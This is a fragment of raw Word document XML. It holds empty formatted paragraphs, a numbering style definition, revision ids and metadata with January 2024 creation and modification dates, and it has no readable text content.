    <w:p w14:paraId="39A3EF6E" w14:textId="61250FC6" w:rsidR="00A06437" w:rsidRDefault="00A06437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65DAFD56" w14:textId="77777777" w:rsidR="00A06437" w:rsidRDefault="00A06437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39127434" w14:textId="1400C6EF" w:rsidR="00A06437" w:rsidRDefault="00A06437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CDC82B5" w14:textId="77777777" w:rsidR="00A06437" w:rsidRDefault="00A06437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F36EED" w14:textId="77777777" w:rsidR="002A4A76" w:rsidRDefault="002A4A76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441FB686" w14:textId="0FAA1344" w:rsidR="002A4A76" w:rsidRDefault="002A4A76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB1D05A" w14:textId="77777777" w:rsidR="002A4A76" w:rsidRDefault="002A4A76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="301C71F7" w14:textId="4E4CEA7E" w:rsidR="002A4A76" w:rsidRDefault="002A4A76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77CCD4D6" w14:textId="77777777" w:rsidR="002A4A76" w:rsidRDefault="002A4A76">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29BF0A7E" w14:textId="210243D7" w:rsidR="00153CEB" w:rsidRDefault="00153CEB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF14E31" w14:textId="77777777" w:rsidR="00153CEB" w:rsidRPr="0047294A" w:rsidRDefault="00153CEB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00153CEB" w:rsidRPr="0047294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E668E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0409001D"/>
    <w:styleLink w:val="Style1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"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman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3D37"/>
    <w:rsid w:val="00153CEB"/>
    <w:rsid w:val="00185692"/>
    <w:rsid w:val="00197DB9"/>
    <w:rsid w:val="002A4A76"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="0047294A"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="0089618E"/>
    <w:rsid w:val="009243AF"/>
    <w:rsid w:val="00A06437"/>
    <w:rsid w:val="00A72DCD"/>
    <w:rsid w:val="00B53D37"/>
    <w:rsid w:val="00BC3BFB"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00DA57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56BABE9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7CC8D42E-EC4F-3240-8F32-871A77FCF4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Style1">
    <w:name w:val="Style1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BD107F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="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4</Pages>
  <Words>201</Words>
  <Characters>1150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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-10T04:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-10T11:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>